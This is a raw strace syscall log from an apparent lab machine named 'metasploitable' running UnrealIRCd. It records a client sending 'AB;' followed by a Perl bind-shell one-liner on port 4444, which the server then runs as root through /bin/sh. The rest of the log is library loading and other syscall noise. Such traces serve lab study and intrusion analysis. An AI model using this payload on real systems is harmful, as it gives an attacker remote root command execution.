4519  07:20:54.834001 select(1024, [2 3 4 7 9], [], NULL, {0, 490000}) = 1 (in [4], left {0, 430000})

4519  07:20:54.890818 clock_gettime(CLOCK_MONOTONIC, {1664, 707840102}) = 0

4519  07:20:54.890841 recv(4, "PRIVMSG  #testit Hiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii\n", 8192, 0) = 54

4519  07:20:54.890874 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 250000}, ...}) = 0

4519  07:20:54.890893 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 250000}, ...}) = 0

4519  07:20:54.890907 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 250000}, ...}) = 0

4519  07:20:54.890921 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 250000}, ...}) = 0

4519  07:20:54.890935 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 250000}, ...}) = 0

4519  07:20:54.890949 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 250000}, ...}) = 0

4519  07:20:54.890962 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 250000}, ...}) = 0

4519  07:20:54.890976 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 250000}, ...}) = 0

4519  07:20:54.890989 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 250000}, ...}) = 0

4519  07:20:54.891003 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 250000}, ...}) = 0

4519  07:20:54.891016 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 250000}, ...}) = 0

4519  07:20:54.891029 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 250000}, ...}) = 0

4519  07:20:54.891043 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 250000}, ...}) = 0

4519  07:20:54.891056 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 250000}, ...}) = 0

4519  07:20:54.891069 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 250000}, ...}) = 0

4519  07:20:54.891142 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 250000}, ...}) = 0

4519  07:20:54.891173 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 250000}, ...}) = 0

4519  07:20:54.891187 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 250000}, ...}) = 0

4519  07:20:54.891201 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 250000}, ...}) = 0

4519  07:20:54.891217 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 250000}, ...}) = 0

4519  07:20:54.891232 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 250000}, ...}) = 0

4519  07:20:54.891259 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 250000}, ...}) = 0

4519  07:20:54.891277 time(NULL)        = 1495624854

4519  07:20:54.891287 time(NULL)        = 1495624854

4519  07:20:54.891300 gettimeofday({1495624854, 891304}, NULL) = 0

4519  07:20:54.891311 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:20:54.891340 clock_gettime(CLOCK_MONOTONIC, {1664, 708353013}) = 0

4519  07:20:54.891350 gettimeofday({1495624854, 891354}, NULL) = 0

4519  07:20:54.891361 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {0, 870000})

4519  07:20:55.024295 clock_gettime(CLOCK_MONOTONIC, {1664, 841316137}) = 0

4519  07:20:55.024330 accept(2, 0, NULL) = 5

4519  07:20:55.024351 getpeername(5, {sa_family=AF_INET, sin_port=htons(38377), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:20:55.024384 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:20:55.024396 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:20:55.024409 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:20:55.024421 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:20:55.024433 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:20:55.024444 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:20:55.024456 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:20:55.024472 clock_gettime(CLOCK_MONOTONIC, {1664, 841485287}) = 0

4519  07:20:55.024483 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:20:55.024495 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:20:55.024505 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:20:55.024514 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:20:55.024524 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:20:55.024548 send(6, "*\352\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:20:55.024642 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:20:55.024729 gettimeofday({1495624855, 24735}, NULL) = 0

4519  07:20:55.024759 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {0, 990000})

4519  07:20:55.032696 clock_gettime(CLOCK_MONOTONIC, {1664, 849717582}) = 0

4519  07:20:55.032769 recvfrom(6, "*\352\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0p\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:20:55.032858 close(6)          = 0

4519  07:20:55.032873 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:20:55.032887 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:20:55.032941 time(NULL)        = 1495624855

4519  07:20:55.032953 time(NULL)        = 1495624855

4519  07:20:55.032986 gettimeofday({1495624855, 32989}, NULL) = 0

4519  07:20:55.033012 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:20:55.033040 clock_gettime(CLOCK_MONOTONIC, {1664, 850052901}) = 0

4519  07:20:55.033050 gettimeofday({1495624855, 33054}, NULL) = 0

4519  07:20:55.033061 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:20:55.034585 clock_gettime(CLOCK_MONOTONIC, {1664, 851602078}) = 0

4519  07:20:55.034602 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:20:55.034633 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:20:55.034654 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:20:55.034667 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:20:55.034683 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 7898

7898  07:20:55.034885 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

7898  07:20:55.034901 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

7898  07:20:55.034912 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7898  07:20:55.034926 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

7898  07:20:55.035034 brk(0)            = 0x80f9000

7898  07:20:55.035056 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7898  07:20:55.035073 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f08000

7898  07:20:55.035089 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

7898  07:20:55.035107 open("/etc/ld.so.cache", O_RDONLY) = 1

7898  07:20:55.035120 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7898  07:20:55.035139 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f00000

7898  07:20:55.035150 close(1)          = 0

7898  07:20:55.035161 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7898  07:20:55.035176 open("/lib/libncurses.so.5", O_RDONLY) = 1

7898  07:20:55.035190 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

7898  07:20:55.035306 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

7898  07:20:55.035356 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ed0000

7898  07:20:55.035369 mmap2(0xb7efd000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7efd000

7898  07:20:55.035401 close(1)          = 0

7898  07:20:55.035413 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7898  07:20:55.035428 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

7898  07:20:55.035443 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

7898  07:20:55.035534 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

7898  07:20:55.035551 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ecc000

7898  07:20:55.035562 mmap2(0xb7ece000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7ece000

7898  07:20:55.035578 close(1)          = 0

7898  07:20:55.035590 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7898  07:20:55.035604 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

7898  07:20:55.035618 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

7898  07:20:55.035710 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

7898  07:20:55.035727 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ecb000

7898  07:20:55.035741 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d7c000

7898  07:20:55.035752 mmap2(0xb7ec5000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ec5000

7898  07:20:55.035767 mmap2(0xb7ec8000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ec8000

7898  07:20:55.035781 close(1)          = 0

7898  07:20:55.035818 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d7b000

7898  07:20:55.035877 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d7b6b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

7898  07:20:55.035935 mprotect(0xb7ec5000, 4096, PROT_READ) = 0

7898  07:20:55.035986 munmap(0xb7f00000, 29913) = 0

7898  07:20:55.036012 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7898  07:20:55.036026 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

7898  07:20:55.036047 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfac1c80) = -1 ENOTTY (Inappropriate ioctl for device)

7898  07:20:55.036078 brk(0)            = 0x80f9000

7898  07:20:55.036087 brk(0x80fa000)    = 0x80fa000

7898  07:20:55.036099 brk(0x80fb000)    = 0x80fb000

7898  07:20:55.036116 getuid32()        = 0

7898  07:20:55.036125 getgid32()        = 0

7898  07:20:55.036135 geteuid32()       = 0

7898  07:20:55.036144 getegid32()       = 0

7898  07:20:55.036158 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7898  07:20:55.036172 time(NULL)        = 1495624855

7898  07:20:55.036185 brk(0x80fc000)    = 0x80fc000

7898  07:20:55.036199 brk(0x80fd000)    = 0x80fd000

7898  07:20:55.036219 open("/proc/meminfo", O_RDONLY) = 1

7898  07:20:55.036241 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

7898  07:20:55.036259 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f07000

7898  07:20:55.036271 read(1, "MemTotal:      1035240 kB\nMemFree:        536808 kB\nBuffers:         65080 kB\nCached:         276152 kB\nSwapCached:          0 kB\nActive:         254488 kB\nInactive:       215708 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        536568 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4660 kB\nWriteback:           0 kB\nAnonPages:      128964 kB\nMapped:          51968 kB\nSlab:            16920 kB\nSReclaimable:     8684 kB\nSUnreclaim:       8236 kB\nPageTables:       1956 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

7898  07:20:55.036425 close(1)          = 0

7898  07:20:55.036437 munmap(0xb7f07000, 4096) = 0

7898  07:20:55.036450 brk(0x80fe000)    = 0x80fe000

7898  07:20:55.036476 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

7898  07:20:55.036490 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

7898  07:20:55.036502 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7898  07:20:55.036514 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7898  07:20:55.036526 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

7898  07:20:55.036539 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

7898  07:20:55.036552 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7898  07:20:55.036564 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7898  07:20:55.036578 uname({sys="Linux", node="metasploitable", ...}) = 0

7898  07:20:55.036626 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

7898  07:20:55.036644 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7898  07:20:55.036663 brk(0x8100000)    = 0x8100000

7898  07:20:55.036679 getcwd("/etc/unreal", 4096) = 12

7898  07:20:55.036694 getpid()          = 7898

7898  07:20:55.036710 getppid()         = 4519

7898  07:20:55.036726 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7898  07:20:55.036748 stat64("/sbin/sh", 0xbfac1c58) = -1 ENOENT (No such file or directory)

7898  07:20:55.036761 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

7898  07:20:55.036779 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

7898  07:20:55.036816 socket(PF_FILE, SOCK_STREAM, 0) = 1

7898  07:20:55.036872 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

7898  07:20:55.036884 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

7898  07:20:55.036906 close(1)          = 0

7898  07:20:55.036918 socket(PF_FILE, SOCK_STREAM, 0) = 1

7898  07:20:55.036929 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

7898  07:20:55.036939 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

7898  07:20:55.036958 close(1)          = 0

7898  07:20:55.036971 open("/etc/nsswitch.conf", O_RDONLY) = 1

7898  07:20:55.036986 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

7898  07:20:55.037003 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f07000

7898  07:20:55.037014 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

7898  07:20:55.037064 read(1, "", 4096) = 0

7898  07:20:55.037074 close(1)          = 0

7898  07:20:55.037083 munmap(0xb7f07000, 4096) = 0

7898  07:20:55.037099 open("/etc/ld.so.cache", O_RDONLY) = 1

7898  07:20:55.037112 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7898  07:20:55.037128 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f00000

7898  07:20:55.037139 close(1)          = 0

7898  07:20:55.037150 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7898  07:20:55.037165 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

7898  07:20:55.037180 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

7898  07:20:55.037269 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

7898  07:20:55.037298 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d72000

7898  07:20:55.037311 mmap2(0xb7d79000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7d79000

7898  07:20:55.037329 close(1)          = 0

7898  07:20:55.037341 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7898  07:20:55.037355 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

7898  07:20:55.037373 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

7898  07:20:55.037461 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

7898  07:20:55.037479 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d5a000

